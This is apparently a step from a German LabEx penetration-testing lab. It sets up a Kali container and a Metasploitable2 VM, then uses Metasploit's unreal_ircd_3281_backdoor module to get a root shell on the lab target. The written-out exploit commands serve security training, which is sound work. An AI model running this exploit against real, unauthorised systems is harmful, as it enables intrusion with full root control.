Erlangen von Root-Zugang auf dem Zielrechner
In diesem Schritt werden wir die Unreal Ircd-Schwachstelle nutzen, um Root-Zugang auf dem Zielrechner zu erhalten.
Nun starten Sie die Angriffsmaschine (Kali Linux-Container) und die Zielmaschine (Metasploitable2-Virtuelle Maschine) für das Experiment.
- Öffnen Sie ein xfce-Terminal auf der LabEx-Hostmaschine und starten Sie die Metasploitable2-Zielmaschine, indem Sie den folgenden Befehl ausführen:
sudo virsh start Metasploitable2
Warten Sie, bis die Zielmaschine gestartet ist. Dies kann 1 - 3 Minuten dauern.
- Testen Sie die Konnektivität zur Zielmaschine, indem Sie sie per Ping anpingen:
ping 192.168.122.102
Drücken Sie Ctrl+C
, um den Ping zu stoppen.
- Starten Sie den Kali Linux-Container und treten Sie in die bash-Umgebung ein, indem Sie folgenden Befehl ausführen:
docker run -ti --network host b5b709a49cd5 bash
- Testen Sie innerhalb des Kali-Containers die Netzwerkverbindung zur Zielmaschine:
ping 192.168.122.102
Drücken Sie Ctrl+C
, um den Ping zu stoppen.
Nun laufen sowohl die Angriffsmaschine als auch die Zielmaschine, und Sie können mit dem Penetrationstest beginnen.
Hinweis: Wenn Sie versehentlich die aktuelle bash-Umgebung verlassen, wird der Kali-Container automatisch gestoppt. Sie können auf dem Host erneut docker run -ti --network host b5b709a49cd5 bash
ausführen, um einen neuen Kali-Container zu starten und in die bash-Umgebung einzutreten, um das Experiment fortzusetzen.
- Geben Sie im Kali Linux-Container die folgenden Befehle im Kali Linux-bash-Terminal ein:
service postgresql start
msfdb init
cd ~
msfconsole
Dadurch wird der PostgreSQL-Datenbankdienst gestartet, die Datenbank initialisiert und die Metasploit-Framework-Konsole (msfconsole) für weitere Operationen gestartet.
- Suchen Sie nach dem Unreal Ircd-Schwachstellenmodul:
search unreal_ircd
- Verwenden Sie das
unix/irc/unreal_ircd_3281_backdoor
-Modul:
use exploit/unix/irc/unreal_ircd_3281_backdoor
- Legen Sie die IP-Adresse des Ziels fest:
set RHOST 192.168.122.102
- Nutzen Sie die Schwachstelle, um Zugang zu erhalten:
exploit
- Prüfen Sie den aktuellen Benutzer:
whoami
Sie sollten sehen, dass Sie Root-Zugang auf der Zielmaschine erhalten haben.
Drücken Sie Ctrl+D
, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung.